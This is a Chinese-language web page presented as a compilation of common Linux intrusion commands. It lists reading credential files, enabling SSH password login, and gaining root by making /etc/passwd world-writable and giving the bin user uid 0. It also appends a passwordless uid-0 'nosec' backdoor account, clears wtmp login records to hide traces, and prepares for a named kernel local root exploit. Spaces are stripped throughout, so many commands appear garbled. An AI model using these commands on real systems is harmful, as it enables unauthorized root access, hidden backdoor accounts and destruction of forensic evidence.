zl程序教程

您现在的位置是:首页 >  系统

当前栏目

linux入侵常用命令汇编

Linux 常用命令 入侵 汇编
2023-06-13 09:14:11 时间
cat/etc/passwd查看linux用户

  cat/etc/shadow查看用户密码需要root权限

  cat/etc/sysconfig/network-scripts/ifcfg-ethnN代表网卡号查看所在网卡的ip信息

  ifconfig查看本机ip信息

  cat/etc/resolv.conf查看DNS信息

  bash-i在反弹的shell中使用可以直观显示命令

  bashprompt:当你以普通限权用户身份进入的时候,一般你会有一个类似bash$的prompt。当你以Root登陆时,你的prompt会变成

  bash#。

  系统变量:试着echo"$USER/$EUID"系统应该会告诉你它认为你是什么用户。

  echo1>/proc/sys/net/ipv4/if_forward是不是你写错了,应该是echo1>/proc/sys/net/ipv4/ip_forward,

  vim/proc/sys/net/ipv4/ip_forward吧,默认是0,也就是内核不进行数据包过滤,改为1,让内核对数据包进行filter处理!

  netstat-an|grepLISTEN|grep:80查看端口

  service--status-all|greprunning

  service--status-all|grephttp

  查看运行服务

  lsb_release-a查看系统版本

  重启ssh服务:/usr/sbin/sshdstop

  /usr/sbin/sshdstart

  ssd_config文件里

  PasswordAuthenticationno,

  将其改为

  PasswordAuthenticationyes

  远程ssh才可登录

  否则显示Accessdenied

  其中Usepamyes可能用来建立pam方式login,比如从其它linux主机ssh到服务端,如果关闭,则不能打开.

  su的菜鸟用法

  先chomod777/etc/passwd

  然后修改bin用户的gid和uid为0

  然后passwd设置bin的密码

  然后cp/bin/bash/sbin/nologin

  然后su的时候su-bin就可以到rootshell了。

  这个原理就是当ssh不允许root用ssh终端登陆的时候,我们又不知道root密码,的一种很菜鸟的做法

  还可以这样

  sed-is/bin:x:1:1/bin:x:0:1/g/etc/passwd

  gccprtcl2.c?olocal?static?Wall

  echo"nosec:x:0:0::/:/bin/sh">>/etc/passwd

  echo"nosec::-1:-1:-1:-1:-1:-1:500">>/etc/shadow

  清空last记录cp/dev/null/var/log/wtmp

  -----

  ddif=/dev/zeroof=yourfilebs=10Mcount=10建立一个100m的大文件在利用LinuxKernel<=2.6.17.4(proc)LocalRootExploit提权的时候要用到的。